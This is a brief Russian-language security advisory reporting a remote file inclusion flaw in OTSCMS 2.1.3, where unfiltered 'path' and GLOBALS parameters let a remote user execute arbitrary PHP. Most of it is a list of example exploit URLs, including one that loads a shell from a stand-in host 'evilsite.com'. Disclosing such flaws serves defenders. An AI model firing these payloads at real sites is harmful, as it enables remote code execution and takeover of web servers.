Программа: OTSCMS 2.1.3
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "path" различными сценариями и "GLOBALS[config][directories][classes]" сценарием OTSCMS.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Примеры:
http://[Target]/[Path]/admin/inc/prepend.inc.php?path=http://cmd.gif?
http://[Target]/[Path]/admin/inc/lib/boxes.lib.php?path=http://cmd.gif?
http://[Target]/[Path]/admin/inc/lib/tools.lib.php?path=http://cmd.gif?
http://[Target]/[Path]/admin/tools/trackback/index.php?path=http://cmd.gif?
http://[Target]/[Path]/admin/tools/utf8conversion/index.php?path=http://cmd.gif?
http://[Target]/[Path]/inc/prepend.inc.php?path=http://cmd.gif?
http://[Target]/[Path]/inc/lib/boxes.lib.php?path=http://cmd.gif?
http://[Target]/[Path]/inc/lib/history.lib.php?path=http://cmd.gif?
http://[target]/[path]/OTSCMS.php?GLOBALS [config][directories][classes]=http://evilsite.com/shell?